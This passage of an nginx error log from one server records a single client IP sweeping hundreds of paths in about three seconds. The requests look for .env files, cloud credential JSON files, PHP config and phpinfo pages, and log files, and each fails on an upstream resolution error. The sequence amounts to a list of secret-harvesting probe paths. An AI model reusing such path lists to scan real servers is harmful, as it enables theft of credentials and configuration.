terminal.profibot.hu, request: "GET /Final_Project/Airflow_Dag/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Final_Project/kafka_twitter/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Final_Project/StartingFile/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /finalVersion/lcomernbootcamp/projbackend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /firebase.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /first-network/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /FIRST_CONFIG/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /fisdom/fisdom/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /fixtures/blocks/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /fixtures/fiber-debugger/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /fixtures/flight/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /fixtures/kitchensink/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /flask/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /flask_test_uploads/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /fm/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /font-icons/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /fonts/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /framework/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /front-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /front-empathy/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /front-end/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /front/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /front/src/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /frontend/momentum-fe/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /frontend/react/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /frontend/vue/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /frontend/web/debug/default/view HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /frontendfinaltest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ftp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ftpmaster/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /functions/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /gcloud.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:55 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /gcp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /gists/cache HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /gists/laravel HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /gists/pusher HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /github-connect/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /google/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /graphiql/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /graphql/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /grems-api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /grems-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Hash/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /hasura/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /hc/restricted HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Helmetjs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /hgs-static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /higlass-website/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /home/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /horde/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /hotpot-app-frontend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /htdocs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /html/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /http/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /httpboot/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /httpdocs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /HUNIV_migration/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /i.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /icon/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /icons/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ikiwiki/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /image_data/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Imagebord/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /images/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /img/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /in.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /inc.config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /includes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /includes/config.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /index.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:56 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /index.php~ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /index1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /inf.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info3.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /info4.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /infophp.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /infos.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ini.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /install/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /InstantCV/server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /internal-api/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /internal/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /internal/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /isadmin.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /items/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /javascript/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /jenkins/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /jo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /joomla/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /js-plugin/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /js/app.[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /js/app.bundle.min.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /js/chunk-79be581b.c4b0f5e4.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /js/chunk-vendors.[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /js/chunks/[chunk-name].[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /js/contact_me.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /js/vendor.[hash].js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /jsrelay/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /jupyter/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /khanlinks/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /kibana/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /kodenames-server/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /kolab-syncroton/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Kubernetes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /kubernetes/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /l.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /lab/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:57 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /lambda/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /latest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /layout/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /lcomernbootcamp/projbackend/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /leafer-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ledger_sync/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /legacy/tests/9.1.1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /legacy/tests/9.2.0 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /legal/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /lemonldap-ng-doc/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /lemonldap-ng-fr-doc/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /letsencrypt/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /lib/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /lib/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /libraries/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Library/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /libs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /lindex.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /linusadmin-phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /linux/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /local.settings.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /localhost/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /locally/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /log.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /log/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /log/development.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /logging/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /login/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /login/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /logs/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /logs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /logs/access.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /logs/app.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:23:58 [error] 309#309: *29551 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /logs/error.log HTTP/1.1", host: 